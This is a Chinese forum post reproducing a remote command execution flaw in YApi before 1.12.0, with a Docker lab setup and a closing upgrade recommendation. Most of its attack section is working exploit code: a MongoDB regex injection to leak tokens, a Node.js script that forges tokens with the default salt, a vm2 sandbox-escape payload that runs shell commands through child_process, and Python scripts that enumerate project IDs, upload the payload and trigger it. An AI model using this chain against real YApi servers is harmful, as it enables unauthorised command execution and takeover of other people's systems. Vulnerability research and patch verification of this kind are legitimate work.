找回密码
 立即注册
注册 登录
×
热搜: 活动 交友 discuz
查看: 72|回复: 0

YApi <1.12.0 远程命令执行漏洞

[复制链接]

2

主题

2

帖子

6

积分

新手上路

Rank: 1

积分
6
发表于 2022-12-2 18:43:23 | 显示全部楼层 |阅读模式
YApi介绍
YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管理。
github:https://github.com/YMFE/yapi/tree/master
漏洞描述
YApi 是一个支持本地部署的可视化接口管理平台。YApi 在 1.12.0 之前的版本(目前所有版本)中由于 base.js 没有正确对 token 参数进行正确过滤,导致存在远程代码执行漏洞。攻击者可通过MongoDB注入获取用户 token,其中包括用户ID、项目ID等参数。yapi后台的pre-request和pre-response方法存在缺陷点,通过注入调用自动化测试接口runAutoTest(),进而利用沙箱逃逸触发命令执行。
漏洞版本
YApi &lt; 1.12.0
环境搭建
docker 搭建 : GitHub - fjc0k/docker-YApi: 接口管理平台 YApi 的 Docker 镜像。
git clone https://github.com/fjc0k/docker-YApi
cd docker-YApi
vim docker-compose.yml
docker-compose up -d
docker-compose.yml 修改为存在漏洞版本,这里使用的是Yapi 版本:1.10.2。
version: &amp;#39;3&amp;#39;

services:
  yapi-web:
    image: jayfong/yapi:1.10.2
    container_name: yapi-web
    ports:
      - 40001:3000
    environment:
      - YAPI_ADMIN_ACCOUNT=admin@docker.yapi
      - YAPI_ADMIN_PASSWORD=adm1n
      - YAPI_CLOSE_REGISTER=true
      - YAPI_DB_SERVERNAME=yapi-mongo
      - YAPI_DB_PORT=27017
      - YAPI_DB_DATABASE=yapi
      - YAPI_MAIL_ENABLE=false
      - YAPI_LDAP_LOGIN_ENABLE=false
      - YAPI_PLUGINS=[]
    depends_on:
      - yapi-mongo
    links:
      - yapi-mongo
    restart: unless-stopped
  yapi-mongo:
    image: mongo:latest
    container_name: yapi-mongo
    volumes:
      - ./data/db:/data/db
    expose:
      - 27017
    restart: unless-stopped使用 docker ps 查看环境搭建成功。


页面地址:http://xxxxx:40001默认用户名:admin@docker.yapi
默认密码:adm1n




docker安装后、需要创建项目、添加接口。
创建项目





添加接口




设置接口状态


导入接口



接口环境设置


若为本地搭建,环境域名修改为:127.0.0.1:40001


非 Chrome 浏览器可忽略接口测试。
接口测试

注意:Chrome浏览器安装插件后、可以发送测试数据。添加教程:https://juejin.im/post/5e3bbd986fb9a07ce152b53d


漏洞复现
修复记录

https://github.com/YMFE/yapi/commit/59bade3a8a43e7db077d38a4b0c7c584f30ddf8c
1、修复Mongo注入导致token泄漏
2、默认关闭Pre-request 和 Pre-respones




修复方式:在if 判断中增加对参数token的验证,token 必须为字符串。
复现思路:

1、通过接口注入获取token2、使用aes192加密方式生成加密后token3、上传vm2逃逸脚本到 pre-response
4、调用自动化测试接口触发逃逸脚本
token爆破

在漏洞描述部分、结合修复记录,发现注入点为 token。查看官方文档:https://hellosean1025.github.io/yapi/openapi.html ,/api/project/get 接受参数为token


在request.body 、query获取到token后 ,进入server/utils/token.js#parseToken()方法。


parseToken()在判断token不为空后 ,进入 aesDecode()解密token,如果解密失败,parseToken() 返回False。


tokens为False,经 if(!tokens) 条件判断后进入 getProjectIdByToken()。该方法使用在请求中获取到的token,查询项目id。在getProjectIdByToken() 内部会调用server/models/token.js#findId()。




mongdb介绍:MongoDB 将数据存储为一个文档,数据结构由键值(key=&gt;value)对组成。MongoDB 文档类似于 JSON 对象。字段值可以包含其他文档,数组及文档数组。
mongdb注入:https://www.anquanke.com/post/id/250101#h3-4
在这里使用 $regex 正则匹配 、根据响应报文判断实现盲注。数据库中token为16进制。


aes192 加密token

在 server/utils/token.js#aseEncode() 方法下已经实现了加密算法,稍微改点代码即可直接使用。要注意的是,aseEncode()方法,data参数为 uid + &amp;#39;|&amp;#39; + token ,password 为 默认salt 或用户自定义salt。默认salt为 abcde




nodejs 加密代码如下,需要安装nodejs。注意:这里的uid是写死的,可以通过使用for循环,改变uid,生成批量token。测试脚本如下:
const crypto = require(&amp;#39;crypto&amp;#39;);

uid = &amp;#34;11&amp;#34;
token = &amp;#34;92af239a4e189e1661db&amp;#34;
data = uid + &amp;#34;|&amp;#34; + token

password = &amp;#34;abcde&amp;#34;

// 如下方法使用指定的算法与密码来创建cipher对象
const cipher = crypto.createCipher(&amp;#39;aes192&amp;#39;, password);

// 使用该对象的update方法来指定需要被加密的数据
let crypted = cipher.update(data, &amp;#39;utf-8&amp;#39;, &amp;#39;hex&amp;#39;);

crypted += cipher.final(&amp;#39;hex&amp;#39;);

console.log(crypted)

上传vm2逃逸脚本

YApi  pre-script:通过自定义 js 脚本方式改变请求的参数和返回的 response 数据。
pre-script 官方介绍:https://hellosean1025.github.io/yapi/documents/project.html#%e8%af%b7%e6%b1%82%e9%85%8d%e7%bd%ae
vm2介绍:vm2 是一个沙箱,可以使用列入白名单的 Node 内置模块运行不受信任的代码。
vm2版本为:3.8.4


这里可以使用 vulhub 上的脚本。
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor(&amp;#39;return process&amp;#39;)
const process = myfun()
mockJson = process.mainModule.require(&amp;#34;child_process&amp;#34;).execSync(&amp;#34;ifconfig&amp;#34;).toString()
context.responseData = &amp;#39;testtest&amp;#39; + mockJson + &amp;#39;testtest&amp;#39;
console.log(responseData)pre-response 上传接口为:/api/project/up?token=加密后的token请求参数为:
{&amp;#34;id&amp;#34;:14,&amp;#34;pre_script&amp;#34;:&amp;#34;&amp;#34;,&amp;#34;after_script&amp;#34;:&amp;#34;&amp;#34;}这里将 参数 after_script 的值替换为 逃逸脚本。参数id 为项目id,需要正确,否则上传失败。id可以使用for循环,进行探测。上传测试脚本:
import requests
import re

token = &amp;#34;bfe07e1692ac38a3babc6438caffe92769f365e1f23caccf960ce46f48244dbc&amp;#34;
url = f&amp;#39;http://xxxxxxxx:40001/api/project/up?token={token}&amp;#39;
headers = {
    &amp;#34;content-type&amp;#34;:&amp;#34;application/json&amp;#34;
}
vm2Script = &amp;#34;&amp;#34;&amp;#34;
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor(&amp;#39;return process&amp;#39;)
const process = myfun()
mockJson = process.mainModule.require(&amp;#34;child_process&amp;#34;).execSync(&amp;#34;ifconfig&amp;#34;).toString()
context.responseData = &amp;#39;testtest&amp;#39; + mockJson + &amp;#39;testtest&amp;#39;
console.log(responseData)
&amp;#34;&amp;#34;&amp;#34;
body_json = {&amp;#34;id&amp;#34;:1,
&amp;#34;pre_script&amp;#34;:&amp;#34;&amp;#34;,
&amp;#34;after_script&amp;#34;:vm2Script}

print(body_json)
id = 1
while id:
    body_json[&amp;#34;id&amp;#34;] = id ## 项目id 需要枚举
    resp = requests.post(url=url,headers=headers,json=body_json)
    print(resp.status_code)
    print(resp.text)
    if resp.status_code == 200 and re.search(&amp;#34;\&amp;#34;errcode\&amp;#34;:0&amp;#34;,resp.text):
        print(&amp;#34;
  • pre-response 脚本上传成功&amp;#34;)
            id = False
        else:
            print(&amp;#34;
  • pre-response 脚本上传失败&amp;#34;)
            id+=1
        print(id)

    漏洞触发

    目前、已上传vm2逃逸脚本,使用自动化测试触发逃逸脚本,实现远程命令执行。YApi  服务端自动化测试 :服务端自动化测试功能是在YApi服务端跑自动化测试,不需要依赖浏览器环境,只需要访问 YApi 提供的 url 链接就能跑自动化测试,非常的简单易用,而且可以集成到 jenkins。自动化测试接口为:/api/open/run_auto_test接口参数:id(需要爆破),token(加密后的token),mode=html


    测试脚本如下:
    import requests
    import re

    token = &amp;#34;bfe07e1692ac38a3babc6438caffe92769f365e1f23caccf960ce46f48244dbc&amp;#34;

    id = 1

    while id:
        url =f&amp;#39;http://xxxxxxxx:40001/api/open/run_auto_test?id={id}&amp;token={token}&amp;mode=html&amp;#39;
        resp = requests.get(url=url)
        if re.search(&amp;#34;YAPI&amp;#34;,resp.text) and re.search(&amp;#34;&lt;!DOCTYPE html&gt;&amp;#34;,resp.text):
            print(&amp;#34;
  • 命令执行成功&amp;#34;)
            # print(url)
            print(&amp;#34;===&amp;#34;)
            print(id)
            print(re.search(&amp;#34;testtest[\s\S]*testtest&amp;#34;,resp.text)[0])
            id = False
            break
        print(url)
        id += 1

    exit()

    脚本测试


    修复建议
    1、目前EXP已公开,受影响用户升级到最新 1.12.0 版本:https://github.com/YMFE/yapi/releases/tag/v1.12.0
    相关参考
    1.https://github.com/YMFE/yapi/commit/59bade3a8a43e7db077d38a4b0c7c584f30ddf8c
    2.https://thegoodhacker.com/posts/the-unsecure-node-vm-module/
    3.https://github.com/patriksimek/vm2/issues/467
    4.https://github.com/vulhub/vulhub/blob/master/yapi/mongodb-inj/README.zh-cn.md
    5.https://mp.weixin.qq.com/s/7mfP5av36j5fOjYDy5dcOA6.https://mp.weixin.qq.com/s/iaQHeIGjoDkRPhOBRd4H5A
    7.https://www.anquanke.com/post/id/250101#h3-4
    漏洞检测工具
    工具地址:https://github.com/StarCrossPortal/scalpel
    已更新:
    1、POC库新增5条热门组件漏洞检测POC:蓝凌OA前台任意文件读取漏洞、MessageSolution 企业邮件归档管理系统EEA 信息泄露漏洞、锐捷RG-UAC统一上网行为管理系统信息泄露漏洞、若依管理系统任意文件下载漏洞、ShopXO任意文件读取漏洞。已内置100+漏洞检测POC。
    2、扫描器功能优化了扫描结果展示(预计在下个版本更新)
    持续更新:漏洞POC库、漏洞检测场景、扫描工具漏洞检测优化(检测逻辑,满足对需要连续数据包关联操作漏洞场景的检测)
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|手机版|小黑屋| 黑客通

    GMT+8, 2025-10-13 14:19 , Processed in 0.098459 second(s), 23 queries .

    Powered by Discuz! X3.4

    Copyright © 2020, LianLian.

    快速回复 返回顶部 返回列表